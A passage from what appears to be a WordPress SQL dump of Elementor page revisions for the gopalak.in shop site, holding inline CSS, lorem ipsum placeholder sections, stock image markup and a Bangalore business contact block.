.elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:18:52','2022-09-30 06:48:52','',1373,'https://gopalak.in/?p=1497',0,'revision','',0),(1498,1,'2022-09-30 12:18:52','2022-09-30 06:48:52','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:18:52','2022-09-30 06:48:52','',1373,'https://gopalak.in/?p=1498',0,'revision','',0),(1499,1,'2022-09-30 12:18:53','2022-09-30 06:48:53','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" 